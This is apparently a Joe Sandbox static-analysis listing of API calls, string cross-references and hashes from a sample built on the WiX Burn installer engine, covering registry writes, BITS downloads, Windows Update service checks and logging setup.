                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,008704DF,InstallerVersion,InstallerVersion,00000000,008704DF,InstallerName,InstallerName,00000000,008704DF,Date,InstalledDate,00000000,008704DF,LogonUser), ref: 0086F733
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A14F4: RegSetValueExW.ADVAPI32(00020006,008B0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0086F335,00000000,?,00020006), ref: 008A1527
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseValue
                                                                                                                                                                                                                                                                                                  • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                                                                                                                                                                                                                                                                  • API String ID: 3132538880-2703781546
                                                                                                                                                                                                                                                                                                  • Opcode ID: f00f94da030b2f62556437ded91efec81b1eb0dc3e41f259e9e4bda9cf9f5756
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5b5e99dd25fd3f8097388777ca4a170601f3ebebb1e34d7627f0b2b4d64a0678
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f00f94da030b2f62556437ded91efec81b1eb0dc3e41f259e9e4bda9cf9f5756
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2410632A406A6B7DF13A658EC06EEF7A65FB11B14F160170FA10F6363DB75DE009681
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 0087E7FF
                                                                                                                                                                                                                                                                                                  • RegisterClassW.USER32(?), ref: 0087E82B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087E836
                                                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(00000080,008B9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0087E89D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0087E8A7
                                                                                                                                                                                                                                                                                                  • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0087E945
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 213125376-288575659
                                                                                                                                                                                                                                                                                                  • Opcode ID: bf6215a796587f3cf685679865f52abc197aadc6391faef094ef79b6e7a10ed9
                                                                                                                                                                                                                                                                                                  • Instruction ID: edd1ce584b3b894986c4af066cbb1c221342feef0287131cbf483fa521d94028
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf6215a796587f3cf685679865f52abc197aadc6391faef094ef79b6e7a10ed9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E41A272900229ABDB208BA5DC45BDEBFB8FF09750F118165FA18EB254D771E940CBA1
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to recreate command-line arguments., xrefs: 0088CA43
                                                                                                                                                                                                                                                                                                  • Failed to copy install arguments for passthrough bundle package, xrefs: 0088CA62
                                                                                                                                                                                                                                                                                                  • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0088CA05
                                                                                                                                                                                                                                                                                                  • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0088CAAC
                                                                                                                                                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle., xrefs: 0088C988
                                                                                                                                                                                                                                                                                                  • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0088C9AD
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0088C7B4
                                                                                                                                                                                                                                                                                                  • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0088C9E7
                                                                                                                                                                                                                                                                                                  • Failed to copy filename for passthrough pseudo bundle., xrefs: 0088C9BE
                                                                                                                                                                                                                                                                                                  • Failed to copy download source for passthrough pseudo bundle., xrefs: 0088C98F
                                                                                                                                                                                                                                                                                                  • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0088C9C5
                                                                                                                                                                                                                                                                                                  • Failed to copy related arguments for passthrough bundle package, xrefs: 0088CA82
                                                                                                                                                                                                                                                                                                  • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0088C9B7
                                                                                                                                                                                                                                                                                                  • pseudobundle.cpp, xrefs: 0088C7A8, 0088C9A1, 0088C9DB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-115096447
                                                                                                                                                                                                                                                                                                  • Opcode ID: b197dd134e7c4feacf4bb844a11575fc9b366ee57fa42cd86d075ceaf1aa2372
                                                                                                                                                                                                                                                                                                  • Instruction ID: fb3813291192e14c09dbaf2a922151bbfae73792659c80571b170b35dfde04a8
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b197dd134e7c4feacf4bb844a11575fc9b366ee57fa42cd86d075ceaf1aa2372
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDB12675A0061AEFCB11EF68C881F55BBA5FF08714F1181A9ED14EB356CB35E811DBA0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0088DE61
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Falied to start BITS job., xrefs: 0088E019
                                                                                                                                                                                                                                                                                                  • Failed while waiting for BITS download., xrefs: 0088E012
                                                                                                                                                                                                                                                                                                  • Failed to set credentials for BITS job., xrefs: 0088DF0F
                                                                                                                                                                                                                                                                                                  • Failed to initialize BITS job callback., xrefs: 0088DF82
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job callback., xrefs: 0088DF74
                                                                                                                                                                                                                                                                                                  • Failed to add file to BITS job., xrefs: 0088DF2E
                                                                                                                                                                                                                                                                                                  • bitsengine.cpp, xrefs: 0088DE77, 0088DF6A
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job., xrefs: 0088DEF0
                                                                                                                                                                                                                                                                                                  • Invalid BITS engine URL: %ls, xrefs: 0088DE83
                                                                                                                                                                                                                                                                                                  • Failed to download BITS job., xrefs: 0088DFF8
                                                                                                                                                                                                                                                                                                  • Failed to copy download URL., xrefs: 0088DEA8
                                                                                                                                                                                                                                                                                                  • Failed to complete BITS job., xrefs: 0088E00B
                                                                                                                                                                                                                                                                                                  • Failed to set callback interface for BITS job., xrefs: 0088DF99
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-2382896028
                                                                                                                                                                                                                                                                                                  • Opcode ID: fc972bf877b022420314e3150debd1f8dcf04d0b6c27c3f110396fde418c2bda
                                                                                                                                                                                                                                                                                                  • Instruction ID: aa5dc80f9a3f373b4102be8488e95595e1e5aa390c77ec65133162b2c7cac0d9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc972bf877b022420314e3150debd1f8dcf04d0b6c27c3f110396fde418c2bda
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE61A431A00725EBCB21AB94C885E5E7BB4FF08760B114556FD05EF391DBB5DD00AB91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086BCE5
                                                                                                                                                                                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0086BDF2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0086BDFC
                                                                                                                                                                                                                                                                                                  • WaitForInputIdle.USER32(?,?), ref: 0086BE50
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0086BE9B
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?), ref: 0086BEA8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                                                                                                                                                                                                                                                                  • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 155678114-2737401750
                                                                                                                                                                                                                                                                                                  • Opcode ID: 83dcf18b396f28031bd729d356ab5fa119b992deb0aac85cf9a3e917c0e7d7df
                                                                                                                                                                                                                                                                                                  • Instruction ID: 455d66a6e65d0e921866b765b3fc18f9febf6e291c7298d323d4930eda32b129
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 83dcf18b396f28031bd729d356ab5fa119b992deb0aac85cf9a3e917c0e7d7df
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD516972D0061ABBDF12AFD4CC429EEBB78FF04314B164165FA14F6211E7369E909B91
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00886F28,?), ref: 00886A0B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886A18
                                                                                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886A60
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886A6C
                                                                                                                                                                                                                                                                                                  • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886AA6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00886F28,?,?,?), ref: 00886AB0
                                                                                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00886B67
                                                                                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(?), ref: 00886B71
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                                                                                                                                                                                                                                                                  • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                                                                                                                                                                                                                                                                  • API String ID: 971853308-301359130
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7362298d65ff67e43e1d511028c317717797fd42e5efd91808bfb23835aeda8a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 03556ad8ab1d4a14a65ace806707bfe7769494c378c078ef2cee66ac7e65794a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7362298d65ff67e43e1d511028c317717797fd42e5efd91808bfb23835aeda8a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A641A372E40739ABD721AAA88C45EAEBBA4FF05724B058025FD11FB341F674DC1087A0
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A2B3
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0086A30E
                                                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0086A32F
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0086A405
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0086A396
                                                                                                                                                                                                                                                                                                  • Failed to set variable., xrefs: 0086A3BD
                                                                                                                                                                                                                                                                                                  • Failed to query registry key value., xrefs: 0086A36A
                                                                                                                                                                                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0086A37A
                                                                                                                                                                                                                                                                                                  • Failed to open registry key. Key = '%ls', xrefs: 0086A3C7
                                                                                                                                                                                                                                                                                                  • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0086A3DD
                                                                                                                                                                                                                                                                                                  • Failed to format key string., xrefs: 0086A2BE
                                                                                                                                                                                                                                                                                                  • Failed to format value string., xrefs: 0086A319
                                                                                                                                                                                                                                                                                                  • search.cpp, xrefs: 0086A360
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open@16$CloseQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2702208347-46557908
                                                                                                                                                                                                                                                                                                  • Opcode ID: e053d1bb05976cffd224b6db6ecced4b505ca1ca00ed0d21ee8ada842855f21c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 19b53c543bc0b6d55164e5a5d0cf2a57a0c4e87ebcaf3d1b38b3b1fe871a652b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e053d1bb05976cffd224b6db6ecced4b505ca1ca00ed0d21ee8ada842855f21c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21412632D40128BBEB266A98CD06FAEBE64FB05710F124261FD14F6392D7759E009F92
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,0086BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B210
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086BAFB,00000008,?,00000000,00000000,?,?,?,00000000,7774C3F0,00000000), ref: 0086B21C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                                                                                                                                                                                                  • String ID: .wix$.wixburn$Bundle guid didn't match the guid in the PE Header in memory.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get module handle to process.$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$burn$section.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4242514867-926796631
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,ntdll,?), ref: 0086699B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008669A5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,RtlGetVersion), ref: 008669E8
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008669F2
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 00866B03
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to locate NTDLL.$Failed to locate RtlGetVersion.$Failed to set variant value.$RtlGetVersion$ntdll$variable.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3057421322-109962352
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • TlsAlloc.KERNEL32(?,00000001,00000001,00000000,00000000,?,?,?,00865466,?,?,?,?), ref: 00864920
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00865466,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00864931
                                                                                                                                                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00864A6E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00865466,?,?,?,?,?,?,?,?,?,?,?), ref: 00864A77
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create the message window., xrefs: 008649CC
                                                                                                                                                                                                                                                                                                  • Failed to connect to unelevated process., xrefs: 00864916
                                                                                                                                                                                                                                                                                                  • Failed to pump messages from parent process., xrefs: 00864A42
                                                                                                                                                                                                                                                                                                  • Failed to set elevated pipe into thread local storage for logging., xrefs: 008649A8
                                                                                                                                                                                                                                                                                                  • Failed to allocate thread local storage for logging., xrefs: 0086495F
                                                                                                                                                                                                                                                                                                  • engine.cpp, xrefs: 00864955, 0086499E
                                                                                                                                                                                                                                                                                                  • comres.dll, xrefs: 008649DD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocCloseErrorHandleLastMutexRelease
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate thread local storage for logging.$Failed to connect to unelevated process.$Failed to create the message window.$Failed to pump messages from parent process.$Failed to set elevated pipe into thread local storage for logging.$comres.dll$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 687263955-1790235126
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,?,00000000,crypt32.dll), ref: 00873BA2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,crypt32.dll), ref: 00873BAC
                                                                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,?,00000104,?,?,00000000,crypt32.dll), ref: 00873C15
                                                                                                                                                                                                                                                                                                  • ProcessIdToSessionId.KERNEL32(00000000,?,00000000,crypt32.dll), ref: 00873C1C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,?,?,?,?,?,7FFFFFFF,?,?,?,?,?,00000000,crypt32.dll), ref: 00873CA6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get temp folder., xrefs: 00873BDA
                                                                                                                                                                                                                                                                                                  • Failed to format session id as a string., xrefs: 00873C4A
                                                                                                                                                                                                                                                                                                  • Failed to get length of temp folder., xrefs: 00873C06
                                                                                                                                                                                                                                                                                                  • Failed to copy temp folder., xrefs: 00873CCF
                                                                                                                                                                                                                                                                                                  • %u\, xrefs: 00873C36
                                                                                                                                                                                                                                                                                                  • Failed to get length of session id string., xrefs: 00873C71
                                                                                                                                                                                                                                                                                                  • crypt32.dll, xrefs: 00873B61
                                                                                                                                                                                                                                                                                                  • logging.cpp, xrefs: 00873BD0
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
